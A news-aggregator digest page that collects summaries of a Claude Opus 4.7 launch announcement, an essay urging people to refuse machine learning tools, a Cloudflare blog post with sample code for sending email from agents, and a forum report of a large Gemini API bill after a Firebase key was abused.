10 interesting stories served every morning and every evening.




1 1,631 shares, 84 trendiness

Introducing Claude Opus 4.7

Our latest model, Claude Opus 4.7, is now generally available. Opus 4.7 is a notable improvement on Opus 4.6 in advanced software engineering, with particular gains on the most difficult tasks. Users report being able to hand off their hardest coding work—the kind that previously needed close supervision—to Opus 4.7 with confidence. Opus 4.7 handles complex, long-running tasks with rigor and consistency, pays precise attention to instructions, and devises ways to verify its own outputs before reporting back.

The model also has substantially better vision: it can see images in greater resolution. It’s more tasteful and creative when completing professional tasks, producing higher-quality interfaces, slides, and docs. And—although it is less broadly capable than our most powerful model, Claude Mythos Preview—it shows better results than Opus 4.6 across a range of benchmarks:

Last week we announced Project Glasswing, highlighting the risks—and benefits—of AI models for cybersecurity. We stated that we would keep Claude Mythos Preview’s release limited and test new cyber safeguards on less capable models first. Opus 4.7 is the first such model: its cyber capabilities are not as advanced as those of Mythos Preview (indeed, during its training we experimented with efforts to differentially reduce these capabilities). We are releasing Opus 4.7 with safeguards that automatically detect and block requests that indicate prohibited or high-risk cybersecurity uses. What we learn from the real-world deployment of these safeguards will help us work towards our eventual goal of a broad release of Mythos-class models.

Security professionals who wish to use Opus 4.7 for legitimate cybersecurity purposes (such as vulnerability research, penetration testing, and red-teaming) are invited to join our new Cyber Verification Program.

Opus 4.7 is available today across all Claude products and our API, Amazon Bedrock, Google Cloud’s Vertex AI, and Microsoft Foundry. Pricing remains the same as Opus 4.6: $5 per million input tokens and $25 per million output tokens. Developers can use claude-opus-4-7 via the Claude API.

Claude Opus 4.7 has garnered strong feedback from our early-access testers:

In early testing, we’re seeing the potential for a significant leap for our developers with Claude Opus 4.7. It catches its own logical faults during the planning phase and accelerates execution, far beyond previous Claude models. As a financial technology platform serving millions of consumers and businesses at significant scale, this combination of speed and precision could be game-changing: accelerating development velocity for faster delivery of the trusted financial solutions our customers rely on every day.

Anthropic has already set the standard for coding models, and Claude Opus 4.7 pushes that further in a meaningful way as the state-of-the-art model on the market. In our internal evals, it stands out not just for raw capability, but for how well it handles real-world async workflows—automations, CI/CD, and long-running tasks. It also thinks more deeply about problems and brings a more opinionated perspective, rather than simply agreeing with the user.

Claude Opus 4.7 is the strongest model Hex has evaluated.
It correctly reports when data is missing instead of providing plausible-but-incorrect fallbacks, and it resists dissonant-data traps that even Opus 4.6 falls for. It’s a more intelligent, more efficient Opus 4.6: low-effort Opus 4.7 is roughly equivalent to medium-effort Opus 4.6.

On our 93-task coding benchmark, Claude Opus 4.7 lifted resolution by 13% over Opus 4.6, including four tasks neither Opus 4.6 nor Sonnet 4.6 could solve. Combined with faster median latency and strict instruction following, it’s particularly meaningful for complex, long-running coding workflows. It cuts the friction from those multi-step tasks so developers can stay in the flow and focus on building.

Based on our internal research-agent benchmark, Claude Opus 4.7 has the strongest efficiency baseline we’ve seen for multi-step work. It tied for the top overall score across our six modules at 0.715 and delivered the most consistent long-context performance of any model we tested. On General Finance—our largest module—it improved meaningfully on Opus 4.6, scoring 0.813 versus 0.767, while also showing the best disclosure and data discipline in the group. And on deductive logic, an area where Opus 4.6 struggled, Opus 4.7 is solid.

Claude Opus 4.7 extends the limit of what models can do to investigate and get tasks done. Anthropic has clearly optimized for sustained reasoning over long runs, and it shows with market-leading performance. As engineers shift from working 1:1 with agents to managing them in parallel, this is exactly the kind of frontier capability that unlocks new workflows.

We’re seeing major improvements in Claude Opus 4.7’s multimodal understanding, from reading chemical structures to interpreting complex technical diagrams. The higher resolution support is helping Solve Intelligence build best-in-class tools for life sciences patent workflows, from drafting and prosecution to infringement detection and invalidity charting.

Claude Opus 4.7 takes long-horizon autonomy to a new level in Devin. It works coherently for hours, pushes through hard problems rather than giving up, and unlocks a class of deep investigation work we couldn’t reliably run before.

For Replit, Claude Opus 4.7 was an easy upgrade decision. For the work our users do every day, we observed it achieving the same quality at lower cost—more efficient and precise at tasks like analyzing logs and traces, finding bugs, and proposing fixes. Personally, I love how it pushes back during technical discussions to help me make better decisions. It really feels like a better coworker.

Claude Opus 4.7 demonstrates strong substantive accuracy on BigLaw Bench for Harvey, scoring 90.9% at high effort with better reasoning calibration on review tables and noticeably smarter handling of ambiguous document editing tasks. It correctly distinguishes assignment provisions from change-of-control provisions, a task that has historically challenged frontier models. Substance was consistently rated as a strength across our evaluations: correct, thorough, and well-cited.

Claude Opus 4.7 is a very impressive coding model, particularly for its autonomy and more creative reasoning.
On CursorBench, Opus 4.7 is a meaningful jump in capabilities, clearing 70% versus Opus 4.6 at 58%.

For complex multi-step workflows, Claude Opus 4.7 is a clear step up: plus 14% over Opus 4.6 at fewer tokens and a third of the tool errors. It’s the first model to pass our implicit-need tests, and it keeps executing through tool failures that used to stop Opus cold. This is the reliability jump that makes Notion Agent feel like a true teammate.

In our evals, we saw a double-digit jump in accuracy of tool calls and planning in our core orchestrator agents. As users leverage Hebbia to plan and execute on use cases like retrieval, slide creation, or document generation, Claude Opus 4.7 shows the potential to improve agent decision-making in these workflows.

On Rakuten-SWE-Bench, Claude Opus 4.7 resolves 3x more production tasks than Opus 4.6, with double-digit gains in Code Quality and Test Quality. This is a meaningful lift and a clear upgrade for the engineering work our teams are shipping every day.

For CodeRabbit’s code review workloads, Claude Opus 4.7 is the sharpest model we’ve tested. Recall improved by over 10%, surfacing some of the most difficult-to-detect bugs in our most complex PRs, while precision remained stable despite the increased coverage. It’s a bit faster than GPT-5.4 xhigh on our harness, and we’re lining it up for our heaviest review work at launch.

For Genspark’s Super Agent, Claude Opus 4.7 nails the three production differentiators that matter most: loop resistance, consistency, and graceful error recovery. Loop resistance is the most critical. A model that loops indefinitely on 1 in 18 queries wastes compute and blocks users. Lower variance means fewer surprises in prod. And Opus 4.7 achieves the highest quality-per-tool-call ratio we’ve measured.

Claude Opus 4.7 is a meaningful step up for Warp. Opus 4.6 is one of the best models out there for developers, and this model is measurably more thorough on top of that. It passed Terminal Bench tasks that prior Claude models had failed, and worked through a tricky concurrency bug Opus 4.6 couldn’t crack. For us, that’s the signal.

Claude Opus 4.7 is the best model in the world for building dashboards and data-rich interfaces. The design taste is genuinely surprising—it makes choices I’d actually ship. It’s my default daily driver now.

Claude Opus 4.7 is the most capable model we’ve tested at Quantium. Evaluated against leading AI models through our proprietary benchmarking solution, the biggest gains showed up where they matter most: reasoning depth, structured problem-framing, and complex technical work. Fewer corrections, faster iterations, and stronger outputs to solve the hardest problems our clients bring us.

Claude Opus 4.7 feels like a real step up in intelligence. Code quality is noticeably improved, it’s cutting out the meaningless wrapper functions and fallback scaffolding that used to pile up, and fixes its own code as it goes. It’s the cleanest jump we’ve seen since the move from Sonnet 3.7 to the Claude 4 series.

For the computer-use work that sits at the heart of XBOW’s autonomous penetration testing, the new Claude Opus 4.7 is a step change: 98.5% on our visual-acuity benchmark versus 54.5% for Opus 4.6.
Our single biggest Opus pain point effectively disappeared, and that unlocks its use for a whole class of work where we couldn’t use it before.

Claude Opus 4.7 is a solid upgrade with no regressions for Vercel. It’s phenomenal on one-shot coding tasks, more correct and complete than Opus 4.6, and noticeably more honest about its own limits. It even does proofs on systems code before starting work, which is new behavior we haven’t seen from earlier Claude models.

Claude Opus 4.7 is very strong and outperforms Opus 4.6 with a 10% to 15% lift in task success for Factory Droids, with fewer tool errors and more reliable follow-through on validation steps. It carries work all the way through instead of stopping halfway, which is exactly what enterprise engineering teams need.

Claude Opus 4.7 autonomously built a complete Rust text-to-speech engine from scratch—neural model, SIMD kernels, browser demo—then fed its own output through a speech recognizer to verify it matched the Python reference. Months of senior engineering, delivered autonomously. The step up from Opus 4.6 is clear, and the codebase is public.

Claude Opus 4.7 passed three TBench tasks that prior Claude models couldn’t, and it’s landing fixes our previous best model missed, including a race condition. It demonstrates strong precision in identifying real issues, and surfaces important findings that other models either gave up on or didn’t resolve. In Qodo’s real-world code review benchmark, we observed top-tier precision.

On Databricks’ OfficeQA Pro, Claude Opus 4.7 shows meaningfully stronger document reasoning, with 21% fewer errors than Opus 4.6 when working with source information. Across our agentic reasoning over data benchmarks, it is the best-performing Claude model for enterprise document analysis.

For Ramp, Claude Opus 4.7 stands out in agent-team workflows. We’re seeing stronger role fidelity, instruction-following, coordination, and complex reasoning, especially on engineering tasks that span tools, codebases, and debugging context. Compared with Opus 4.6, it needs much less step-by-step guidance, helping us scale the internal agent workflows our engineering teams run.

Claude Opus 4.7 is measurably better than Opus 4.6 for Bolt’s longer-running app-building work, up to 10% better in the best cases, without the regressions we’ve come to expect from very agentic models. It pushes the ceiling on what our users can ship in a single session.

Below are some highlights and notes from our early testing of Opus 4.7:

Instruction following. Opus 4.7 is substantially better at following instructions. Interestingly, this means that prompts written for earlier models can sometimes now produce unexpected results: where previous models interpreted instructions loosely or skipped parts entirely, Opus 4.7 takes the instructions literally. Users should re-tune their prompts and harnesses accordingly.

Improved multimodal support. Opus 4.7 has better vision for high-resolution images: it can accept images up to 2,576 pixels on the long edge (~3.75 megapixels), more than three times as many as prior Claude models.
This opens up a wealth of multimodal uses that depend on fine visual detail: computer-use agents reading dense screenshots, data extractions from complex diagrams, and work that needs pixel-perfect references.1

Real-world work. As well as its state-of-the-art score on the Finance Agent evaluation (see table above), our internal testing showed Opus 4.7 to be a more effective finance analyst than Opus 4.6, producing rigorous analyses and models, more professional presentations, and tighter integration across tasks. Opus 4.7 is also state-of-the-art on GDPval-AA, a third-party evaluation of economically valuable knowledge work across finance, legal, and other domains.

Memory. Opus 4.7 is better at using file system-based memory. It remembers important notes across long, multi-session work, and uses them to move on to new tasks that, as a result, need less up-front context.

The charts below display more evaluation results from our pre-release testing, across a range of different domains:

Overall, Opus 4.7 shows a similar safety profile to Opus 4.6: our evaluations show low rates of concerning behavior such as deception, sycophancy, and cooperation with misuse. On some measures, such as honesty and resistance to malicious “prompt injection” attacks, Opus 4.7 is an improvement on Opus 4.6; in others (such as its tendency to give overly detailed harm-reduction advice on controlled substances), Opus 4.7 is modestly weaker. Our alignment assessment concluded that the model is “largely well-aligned and trustworthy, though not fully ideal in its behavior”. Note that Mythos Preview remains the best-aligned model we’ve trained according to our evaluations. Our safety evaluations are discussed in full in the Claude Opus 4.7 System Card.

Overall misaligned behavior score from our automated behavioral audit. On this evaluation, Opus 4.7 is a modest improvement on Opus 4.6 and Sonnet 4.6, but Mythos Preview still shows the lowest rates of misaligned behavior.

In addition to Claude Opus 4.7 itself, we’re launching the following updates:

More effort control: Opus 4.7 introduces a new xhigh (“extra high”) effort level between high and max, giving users finer control over the tradeoff between reasoning and latency on hard problems. In Claude Code, we’ve raised the default effort level to xhigh for all plans. When testing Opus 4.7 for coding and agentic use cases, we recommend starting with high or xhigh effort.

On the Claude Platform (API): as well as support for higher-resolution images, we’re also launching task budgets in public beta, giving developers a way to guide Claude’s token spend so it can prioritize work across longer runs.

In Claude Code: The new /ultrareview slash command produces a dedicated review session that reads through changes and flags bugs and design issues that a careful reviewer would catch. We’re giving Pro and Max Claude Code users three free ultrareviews to try it out. In addition, we’ve extended auto mode to Max users. Auto mode is a new permissions option where Claude makes decisions on your behalf, meaning that you can run longer tasks with fewer interruptions—and with less risk than if you had chosen to skip all permissions.

Opus 4.7 is a direct upgrade to Opus 4.6, but two changes are worth planning for because they affect token usage.
First, Opus 4.7 uses an updated tokenizer that improves how the model processes text. The tradeoff is that the same input can map to more tokens—roughly 1.0–1.35× depending on the content type. Second, Opus 4.7 thinks more at higher effort levels, particularly on later turns in agentic settings. This improves its reliability on hard problems, but it does mean it produces more output tokens. Users can control token usage in various ways: by using the effort parameter, adjusting their task budgets, or prompting the model to be more concise. In our own testing, the net effect is favorable—token usage across all effort levels is improved on an internal coding evaluation, as shown below—but we recommend measuring the difference on real traffic. We’ve written a migration guide that provides further advice on upgrading from Opus 4.6 to Opus 4.7.

Score on an internal agentic coding evaluation as a function of token usage at each effort level. In this evaluation, the model works autonomously from a single user prompt, and results may not be representative of token usage in interactive coding. See the migration guide for more on tuning effort levels.

...

Read the original on www.anthropic.com »

2 1,012 shares, 50 trendiness

Qwen Studio

...

Read the original on qwen.ai »

3 569 shares, 29 trendiness

The Future of Everything is Lies, I Guess

Some readers are undoubtedly upset that I have not devoted more space to the wonders of machine learning—how amazing LLMs are at code generation, how incredible it is that Suno can turn hummed melodies into polished songs. But this is not an article about how fast or convenient it is to drive a car. We all know cars are fast. I am trying to ask what will happen to the shape of cities.

The personal automobile reshaped streets, all but extinguished urban horses and their waste, supplanted local transit and interurban railways, germinated new building typologies, decentralized cities, created exurban sprawl, reduced incidental social contact, gave rise to the Interstate Highway System (bulldozing Black communities in the process), gave everyone lead poisoning, and became a leading cause of death among young people. Many parts of the US are highly car-dependent, even though a third of us don’t drive. As a driver, cyclist, transit rider, and pedestrian, I think about this legacy every day: how so much of our lives are shaped by the technology of personal automobiles, and the specific way the US uses them.

I want you to think about AI in this sense.

Some of our pos­si­ble fu­tures are grim, but man­age­able. Others are down­right ter­ri­fy­ing, in which large num­bers of peo­ple lose their homes, health, or lives. I don’t have a strong sense of what will hap­pen, but the space of pos­si­ble fu­tures feels much broader in 2026 than it did in 2022, and most of those fu­tures feel bad.

Much of the bull­shit fu­ture is al­ready here, and I am pro­foundly tired of it. There is slop in my search re­sults, at the gym, at the doc­tor’s of­fice. Customer ser­vice, con­trac­tors, and en­gi­neers use LLMs to blindly lie to me. The elec­tric com­pany has hiked our rates and says data cen­ters are to blame. LLM scrap­ers take down the web sites I run and make it harder to ac­cess the ser­vices I rely on. I watch syn­thetic videos of suf­fer­ing an­i­mals and stare at gen­er­ated web pages which lie about po­lice bru­tal­ity. There is LLM spam in my in­box and syn­thetic CSAM on my mod­er­a­tion dash­board. I watch peo­ple out­source their work, food, travel, art, even re­la­tion­ships to ChatGPT. I read chat­bots lin­ing the delu­sional war­rens of men­tal health crises.

I am asked to an­a­lyze va­por­ware and to dis­prove non­sen­si­cal claims. I wade through vo­lu­mi­nous LLM-generated pull re­quests. Prospective clients ask Claude to do the work they might have hired me for. Thankfully Claude’s code is bad, but that could change, and that scares me. I worry about los­ing my home. I could re­train, but my core skills—read­ing, think­ing, and writ­ing—are squarely in the blast ra­dius of large lan­guage mod­els. I imag­ine go­ing to school to be­come an ar­chi­tect, just to watch ML eat that field too.

It is deeply alienating to see so many of my peers wildly enthusiastic about ML’s potential applications, and using it personally. Governments and industry seem all-in on AI, and I worry that by doing so, we’re hastening the arrival of unpredictable but potentially devastating consequences—personal, cultural, economic, and humanitarian.

I’ve thought about this a lot over the last few years, and I think the best response is to stop. ML assistance reduces our performance and persistence, and denies us both the muscle memory and deep theory-building that comes with working through a task by hand: the cultivation of what James C. Scott would call metis. I have never used an LLM for my writing, software, or personal life, because I care about my ability to write well, reason deeply, and stay grounded in the world. If I ever adopt ML tools in more than an exploratory capacity, I will need to take great care. I also try to minimize what I consume from LLMs. I read cookbooks written by human beings, I trawl through university websites to identify wildlife, and I talk through my problems with friends.

I think you should do the same.

Refuse to insult your readers: think your own thoughts and write your own words. Call out people who send you slop. Flag ML hazards at work and with friends. Stop paying for ChatGPT at home, and convince your company not to sign a deal for Gemini. Form or join a labor union, and push back against management demands that you adopt Copilot—after all, it’s for entertainment purposes only. Call your members of Congress and demand aggressive regulation which holds ML companies responsible for their carbon and digital emissions. Advocate against tax breaks for ML datacenters. If you work at Anthropic, xAI, etc., you should think seriously about your role in making the future. To be frank, I think you should quit your job.

I don’t think this will stop ML from ad­vanc­ing al­to­gether: there are still lots of peo­ple who want to make it hap­pen. It will, how­ever, slow them down, and this is good. Today’s mod­els are al­ready very ca­pa­ble. It will take time for the ef­fects of the ex­ist­ing tech­nol­ogy to be fully felt, and for cul­ture, in­dus­try, and gov­ern­ment to adapt. Each day we de­lay the ad­vance­ment of ML mod­els buys time to learn how to man­age tech­ni­cal debt and er­rors in­tro­duced in le­gal fil­ings. Another day to pre­pare for ML-generated CSAM, so­phis­ti­cated fraud, ob­scure soft­ware vul­ner­a­bil­i­ties, and AI Barbie. Another day for work­ers to find new jobs.

Staving off ML will also as­suage your con­science over the com­ing decades. As some­one who once quit an oth­er­wise good job on eth­i­cal grounds, I feel good about that de­ci­sion. I think you will too.

And if I’m wrong, we can al­ways build it later.

Despite feel­ing a bit­ter dis­taste for this gen­er­a­tion of ML sys­tems and the peo­ple who brought them into ex­is­tence, they do seem use­ful. I want to use them. I prob­a­bly will at some point.

For ex­am­ple, I’ve got these color-chang­ing lights. They speak a pro­to­col I’ve never heard of, and I have no idea where to even be­gin. I could spend a month dig­ging through man­u­als and work­ing it out from scratch—or I could ask an LLM to write a client li­brary for me. The se­cu­rity con­se­quences are min­i­mal, it’s a con­strained use case that I can ver­ify by hand, and I would­n’t be push­ing tech debt on any­one else. I still write plenty of code, and I could stop any time. What would be the harm?

Many friends con­tributed dis­cus­sion, read­ing ma­te­r­ial, and feed­back on this ar­ti­cle. My heart­felt thanks to Peter Alvaro, Kevin Amidon, André Arko, Taber Bain, Silvia Botros, Daniel Espeset, Julia Evans, Brad Greenlee, Coda Hale, Marc Hedlund, Sarah Huffman, Dan Mess, Nelson Minar, Alex Rasmussen, Harper Reed, Daliah Saper, Peter Seibel, Rhys Seiffe, and James Turnbull.

This piece, like most all my words and soft­ware, was writ­ten by hand—mainly in Vim. I com­posed a Markdown out­line in a mix of head­ers, bul­let points, and prose, then re­or­ga­nized it in a few passes. With the struc­ture laid out, I rewrote the out­line as prose, type­set with Pandoc. I went back to make sub­stan­tial ed­its as I wrote, then made two full edit passes on type­set PDFs. For the first I used an iPad and sty­lus, for the sec­ond, the tra­di­tional pen and pa­per, read aloud.

I cir­cu­lated the re­sult­ing draft among friends for their feed­back be­fore pub­li­ca­tion. Incisive ideas and de­light­ful turns of phrase may be at­trib­uted to them; any er­rors or ob­jec­tion­able view­points are, of course, mine alone.

...

Read the original on aphyr.com »

4 434 shares, 24 trendiness

Cloudflare Email Service now in public beta

Email is the most ac­ces­si­ble in­ter­face in the world. It is ubiq­ui­tous. There’s no need for a cus­tom chat ap­pli­ca­tion, no cus­tom SDK for each chan­nel. Everyone al­ready has an email ad­dress, which means every­one can al­ready in­ter­act with your ap­pli­ca­tion or agent. And your agent can in­ter­act with any­one.

If you are build­ing an ap­pli­ca­tion, you al­ready rely on email for signups, no­ti­fi­ca­tions, and in­voices. Increasingly, it is not just your ap­pli­ca­tion logic that needs this chan­nel. Your agents do, too. During our pri­vate beta, we talked to de­vel­op­ers who are build­ing ex­actly this: cus­tomer sup­port agents, in­voice pro­cess­ing pipelines, ac­count ver­i­fi­ca­tion flows, multi-agent work­flows. All built on top of email. The pat­tern is clear: email is be­com­ing a core in­ter­face for agents, and de­vel­op­ers need in­fra­struc­ture pur­pose-built for it.

Cloudflare Email Service is that piece. With Email Routing, you can receive email to your application or agent. With Email Sending, you can reply to emails or send outbounds to notify your users when your agents are done doing work. And with the rest of the developer platform, you can build a full email client, with the Agents SDK’s onEmail hook available as native functionality.

Today, as part of Agents Week, Cloudflare Email Service is en­ter­ing pub­lic beta, al­low­ing any ap­pli­ca­tion and any agent to send emails. We are also com­plet­ing the toolkit for build­ing email-na­tive agents:

Email Sending bind­ing, avail­able from your Workers and the Agents SDK

Email Sending grad­u­ates from pri­vate beta to pub­lic beta to­day. You can now send trans­ac­tional emails di­rectly from Workers with a na­tive Workers bind­ing — no API keys, no se­crets man­age­ment.

export default {
  async fetch(request, env, ctx) {
    await env.EMAIL.send({
      to: "[email protected]",
      from: "[email protected]",
      subject: "Your order has shipped",
      text: "Your order #1234 has shipped and is on its way."
    });

    return new Response("Email sent");
  }
};

Or send from any plat­form, any lan­guage, us­ing the REST API and our TypeScript, Python, and Go SDKs:

  --header "Content-Type: application/json" \
  --data '{
    "to": "[email protected]",
    "from": "[email protected]",
    "subject": "Your order has shipped",
    "text": "Your order #1234 has shipped and is on its way."
  }'

Sending email that ac­tu­ally reaches in­boxes usu­ally means wrestling with SPF, DKIM, and DMARC records. When you add your do­main to Email Service, we con­fig­ure all of it au­to­mat­i­cally. Your emails are au­then­ti­cated and de­liv­ered, not flagged as spam. And be­cause Email Service is a global ser­vice built on Cloudflare’s net­work, your emails are de­liv­ered with low la­tency any­where in the world.

Combined with Email Routing, which has been free and avail­able for years, you now have com­plete bidi­rec­tional email within a sin­gle plat­form. Receive an email, process it in a Worker, and re­ply, all with­out leav­ing Cloudflare.

For the full deep dive on Email Sending, re­fer to our Birthday Week an­nounce­ment. The rest of this post de­scribes what Email Service un­locks for agents.

The Agents SDK for build­ing agents on Cloudflare al­ready has a first-class onE­mail hook for re­ceiv­ing and pro­cess­ing in­bound email. But un­til now, your agent could only re­ply syn­chro­nously, or send emails to mem­bers of your Cloudflare ac­count.

With Email Sending, that con­straint is gone. This is the dif­fer­ence be­tween a chat­bot and an agent.

Email agents re­ceive a mes­sage, or­ches­trate work across the plat­form, and re­spond asyn­chro­nously.

A chat­bot re­sponds in the mo­ment or not at all. An agent thinks, acts, and com­mu­ni­cates on its own time­line. With Email Sending, your agent can re­ceive a mes­sage, spend an hour pro­cess­ing data, check three other sys­tems, and then re­ply with a com­plete an­swer. It can sched­ule fol­low-ups. It can es­ca­late when it de­tects an edge case. It can op­er­ate in­de­pen­dently. In other words: it can ac­tu­ally do work, not just an­swer ques­tions.

Here’s what a sup­port agent looks like with the full pipeline — re­ceive, per­sist, and re­ply:

import { Agent, routeAgentEmail } from "agents";
import { createAddressBasedEmailResolver, type AgentEmail } from "agents/email";
import PostalMime from "postal-mime";

export class SupportAgent extends Agent {
  async onEmail(email: AgentEmail) {
    const raw = await email.getRaw();
    const parsed = await PostalMime.parse(raw);

    // Persist in agent state
    this.setState({
      ...this.state,
      ticket: { from: email.from, subject: parsed.subject, body: parsed.text, messageId: parsed.messageId },
    });

    // Kick off long running background agent task
    // Or place a message on a Queue to be handled by another Worker

    // Reply here or in other Worker handler, like a Queue handler
    await this.sendEmail({
      binding: this.env.EMAIL,
      fromName: "Support Agent",
      from: "[email protected]",
      to: this.state.ticket.from,
      inReplyTo: this.state.ticket.messageId,
      subject: `Re: ${this.state.ticket.subject}`,
      text: `Thanks for reaching out. We received your message about "${this.state.ticket.subject}" and will follow up shortly.`,
    });
  }
}

export default {
  async email(message, env) {
    await routeAgentEmail(message, env, {
      resolver: createAddressBasedEmailResolver("SupportAgent"),
    });
  },
} satisfies ExportedHandler;

If you’re new to the Agents SDK’s email capabilities, here’s what’s happening under the hood.

Each agent gets its own identity from a single domain. The address-based resolver routes [email protected] to a “support” agent instance, [email protected] to a “sales” instance, and so on. You don’t need to provision separate inboxes — the routing is built into the address. You can even use sub-addressing ([email protected]) to route to different agent namespaces and instances.
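To make the routing concrete, here is a minimal sketch of the idea (not the Agents SDK’s actual resolver, just the general shape of mapping an inbound address to an agent instance). The parseRecipient helper and the AgentRoute type are invented for this illustration:

// Illustrative only: how an address-based resolver can map a recipient
// address to an agent instance. This is not the SDK's internal logic.
interface AgentRoute {
  instance: string;   // which agent instance to wake up ("support", "sales", ...)
  tag: string | null; // optional sub-address detail ("billing" from "support+billing@...")
}

function parseRecipient(to: string): AgentRoute {
  // One domain serves every agent, so the domain part is ignored.
  const [local] = to.toLowerCase().split("@");
  // Sub-addressing: "support+billing" still targets the "support" instance,
  // while the tag can select a narrower namespace or workflow.
  const parts = local.split("+");
  return { instance: parts[0], tag: parts[1] ?? null };
}

// parseRecipient("support+billing@example.com")
//   -> { instance: "support", tag: "billing" }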

State per­sists across emails. Because agents are backed by Durable Objects, call­ing this.set­State() means your agent re­mem­bers con­ver­sa­tion his­tory, con­tact in­for­ma­tion, and con­text across ses­sions. The in­box be­comes the agen­t’s mem­ory, with­out need­ing a sep­a­rate data­base or vec­tor store.

Secure reply routing is built in. When your agent sends an email and expects a reply, you can sign the routing headers with HMAC-SHA256 so that replies route back to the exact agent instance that sent the original message. This prevents attackers from forging headers to route emails to arbitrary agent instances — a security concern that most “email for agents” solutions haven’t addressed.
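The signing side of that can be sketched with the Web Crypto API available in Workers. The value format, the secret handling, and the helper names below are assumptions for illustration; they are not the SDK’s real scheme:

// Illustrative only: sign and verify a reply-routing value with HMAC-SHA256,
// so a reply is routed only if the value was produced with our secret.
const encoder = new TextEncoder();

async function importRouteKey(secret: string): Promise<CryptoKey> {
  return crypto.subtle.importKey(
    "raw",
    encoder.encode(secret),
    { name: "HMAC", hash: "SHA-256" },
    false,
    ["sign", "verify"],
  );
}

// Produce a value like "support-1234.ab12cd..." to embed in an outbound header.
async function signRoute(secret: string, instance: string): Promise<string> {
  const key = await importRouteKey(secret);
  const mac = await crypto.subtle.sign("HMAC", key, encoder.encode(instance));
  const hex = [...new Uint8Array(mac)].map((b) => b.toString(16).padStart(2, "0")).join("");
  return `${instance}.${hex}`;
}

// Returns the instance name if the signature checks out, otherwise null.
async function verifyRoute(secret: string, value: string): Promise<string | null> {
  const dot = value.lastIndexOf(".");
  if (dot < 0) return null;
  const instance = value.slice(0, dot);
  return (await signRoute(secret, instance)) === value ? instance : null;
}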

This is the com­plete email agent pipeline that teams are build­ing from scratch else­where: re­ceive email, parse it, clas­sify it, per­sist state, kick off async work­flows, re­ply or es­ca­late — all within a sin­gle Agent class, de­ployed glob­ally on Cloudflare’s net­work.

Email Service is­n’t only for agents run­ning on Cloudflare. Agents run every­where, whether it’s cod­ing agents like Claude Code, Cursor, or Copilot run­ning lo­cally or in re­mote en­vi­ron­ments, or pro­duc­tion agents run­ning in con­tain­ers or ex­ter­nal clouds. They all need to send email from those en­vi­ron­ments. We’re ship­ping three in­te­gra­tions that make Email Service ac­ces­si­ble to any agent, re­gard­less of where it runs.

Email is now avail­able through the Cloudflare MCP server, the same Code Mode-powered server that gives agents ac­cess to the en­tire Cloudflare API. With this MCP server, your agent can dis­cover and call the Email end­points to send and con­fig­ure emails. You can send an email with a sim­ple prompt:

“Send me a notification email at [email protected] from my staging domain when the build completes”

For agents running on a computer or a sandbox with bash access, the Wrangler CLI solves the MCP context window problem that we discussed in the Code Mode blog post — tool definitions can consume tens of thousands of tokens before your agent even starts processing a single message. With Wrangler, your agent starts with near-zero context overhead and discovers capabilities on demand through `--help` commands. Here is how your agent can send an email via Wrangler:

wrangler email send \
  --to "[email protected]" \
  --from "[email protected]" \
  --subject "Build completed" \
  --text "The build passed. Deployed to staging."

Regardless of whether you give your agent the Cloudflare MCP or the Wrangler CLI, your agent will now be able to send emails on your behalf with just a prompt.

We are also pub­lish­ing a Cloudflare Email Service skill. It gives your agents com­plete guid­ance: con­fig­ur­ing the Workers bind­ing, send­ing emails via the REST API or SDKs, han­dling in­bound email with Email Routing con­fig­u­ra­tion, build­ing with Agents SDK, and man­ag­ing email through Wrangler CLI or MCP. It also cov­ers de­liv­er­abil­ity best prac­tices and how to craft good trans­ac­tional emails that land in in­boxes rather than spam. Drop it into your pro­ject and your cod­ing agent has every­thing needed to build pro­duc­tion-ready email on Cloudflare.

During the pri­vate beta, we also ex­per­i­mented with email agents. It be­came clear that you of­ten want to keep the hu­man-in-the-loop el­e­ment to re­view emails and see what the agent is do­ing. The best way to do that is to have a fully fea­tured email client with agent au­toma­tions built-in.

That’s why we built Agentic Inbox: a ref­er­ence ap­pli­ca­tion with full con­ver­sa­tion thread­ing, email ren­der­ing, re­ceiv­ing and stor­ing emails and their at­tach­ments, and au­to­mat­i­cally re­ply­ing to emails. It in­cludes a ded­i­cated MCP server built-in, so ex­ter­nal agents can draft emails for your re­view be­fore send­ing from your agen­tic-in­box.

We’re open-sourc­ing Agentic Inbox as a ref­er­ence ap­pli­ca­tion for how to build a full email ap­pli­ca­tion us­ing Email Routing for in­bound, Email Sending for out­bound, Workers AI for clas­si­fi­ca­tion, R2 for at­tach­ments, and Agents SDK for state­ful agent logic. You can de­ploy it to­day to get a full in­box, email client and agent for your emails, with the click of a but­ton.

We want email agent tool­ing to be com­pos­able and reusable. Rather than every team re­build­ing the same in­bound-clas­sify-re­ply pipeline, start with this ref­er­ence ap­pli­ca­tion. Fork it, ex­tend it, use it as a start­ing point for your own email agents that fit your work­flows.

Email is where the world’s most im­por­tant work­flows live, but for agents, it has of­ten been a dif­fi­cult chan­nel to reach. With Email Sending now in pub­lic beta, Cloudflare Email Service be­comes a com­plete plat­form for bidi­rec­tional com­mu­ni­ca­tion, mak­ing the in­box a first-class in­ter­face for your agents.

Whether you’re build­ing a sup­port agent that meets cus­tomers in their in­box or a back­ground process that keeps your team up­dated in real time, your agents now have a seam­less way to com­mu­ni­cate on a global scale. The in­box is no longer a silo. Now it’s one more place for your agents to be help­ful.

Try out Email Sending in the Cloudflare Dashboard
Check out the Email Service MCP server and Skills

...

Read the original on blog.cloudflare.com »

5 382 shares, 9 trendiness

Firebase browser key without API restrictions used for Gemini requests

We are look­ing for guid­ance re­gard­ing an un­ex­pected €54,000+ Gemini API charge that oc­curred within a few hours af­ter en­abling Firebase AI Logic on an ex­ist­ing Firebase pro­ject.

We cre­ated the pro­ject over a year ago and ini­tially used it only for Firebase Authentication. Recently, we added a sim­ple AI fea­ture (generating a web snip­pet from a text prompt) and en­abled Firebase AI Logic.

Shortly af­ter en­abling this, we ex­pe­ri­enced a sud­den and ex­treme spike in Gemini API us­age. The traf­fic was not cor­re­lated with our ac­tual users and ap­peared to be au­to­mated. The ac­tiv­ity oc­curred within a short overnight win­dow and stopped once we dis­abled the API and ro­tated cre­den­tials.

We had a bud­get alert (€80) and a cost anom­aly alert, both of which trig­gered with a de­lay of a few hours

By the time we re­acted, costs were al­ready around €28,000

The fi­nal amount set­tled at €54,000+ due to de­layed cost re­port­ing

This de­scribes our is­sue in more de­tail:

Google API Keys Weren’t Secrets. But then Gemini Changed the Rules. ◆ Truffle…

Google spent over a decade telling de­vel­op­ers that Google API keys (like those used in Maps, Firebase, etc.) are not se­crets. But that’s no longer true.

